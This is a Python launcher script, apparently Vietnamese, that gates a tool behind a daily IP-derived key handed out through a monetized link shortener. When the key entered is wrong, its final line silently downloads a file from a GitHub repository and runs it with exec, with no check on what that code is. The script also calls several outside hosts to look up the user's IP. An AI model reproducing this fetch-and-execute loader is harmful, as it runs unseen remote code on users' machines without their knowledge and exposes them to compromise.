import hashlib
import datetime
import requests
import os
client_ip = requests.get('https://kiemtraip.com/raw.php').text
from time import strftime
now = datetime.datetime.now()
thu = now.strftime('%A')
ngay_hom_nay = now.strftime('%d')
thang_nay = now.strftime('%m')
nam_ = now.strftime('%Y')
now = datetime.datetime.now()
gio_hien_tai = now.strftime('%H:%M:%S')
os.system("clear")
den = "\033[1;90m"
luc = "\033[1;32m"
trang = "\033[1;37m"
red = "\033[1;31m"
vang = "\033[1;33m"
tim = "\033[1;35m"
lamd = "\033[1;34m"
lam = "\033[1;36m"
purple = "\e[35m"
hong = "\033[1;95m"
em = f"""\033[1;36m
                 ███╗   ██╗██╗   ██╗ █████╗ 
                 ████╗  ██║██║   ██║██╔══██╗
                 ██╔██╗ ██║██║   ██║███████║
                 ██║╚██╗██║╚██╗ ██╔╝██╔══██║
                 ██║ ╚████║ ╚████╔╝ ██║  ██║
                 ╚═╝  ╚═══╝  ╚═══╝  ╚═╝  ╚═╝"""
anh="\033[1;31m[\033[1;37m✾\033[1;31m] \033[1;37m➩"                 
def genkey(ip):
    return hashlib.md5(f"{ip}vuhoangpro{datetime.datetime.now().strftime('%Y-%m-%d')}7535gydr".encode()).hexdigest()

FileLuuKey = 'keytoolnva.txt' # Bạn có thể thay tùy thích:v

getIP = requests.get('https://66c8-f8d-b29f-44a-5a90-f94-024c-33d-b8c6.vuhoangpro.site/api/myip.php').text

key = genkey(getIP)
url =  f'https://huongdev.com/?key={key}' # Trang đích 
yeumoney = requests.get(f'https://link4m.co/api-shorten/v2?api=66cd182d82f1d87dd96f0210&url={url}').json()["shortenedUrl"]
while True:
    if os.path.exists(FileLuuKey):
        with open(FileLuuKey, "r") as file:
            file_key = file.read().strip()
        if file_key == key:
            break
        else:
            os.remove(FileLuuKey)
            continue
    print(f"{em}   \n")
    print(f'{anh}  {trang}[{lam} IP Hiện Tại Của Bạn {trang}]{trang}{vang} {vang}: {luc}{client_ip}')
    print(f"{anh} {trang} [ {lam}Thời Gian{trang} ] {vang}: {luc}{gio_hien_tai}")
    print("\033[1;97m= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = ")
    print(f"{anh} \033[1;33mLink Key Ngày \033[1;32m{datetime.datetime.now().strftime('%Y-%m-%d')}:\033[1;36m {yeumoney}")
    print("\033[1;97m= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = ")
    inputkey = input('\033[1;31m[\033[1;37m✾\033[1;31m] \033[1;37m➩ \033[1;33mNhập key \033[1;35m==>: \033[1;95m').strip()
    if inputkey == key:
    	
        print('\033[1;32m Key đúng rồi bú thôi!\033[0;m')
        
        with open(FileLuuKey, "w") as file:
            file.write(inputkey)
        break
    else:
    	
        print('\033[1;31m Key Sai mẹ rồi !!\033[0;m')
        
        
        exec(requests.get('https://raw.githubusercontent.com/Anh2092008/Anh/refs/heads/main/Toolgop').text)
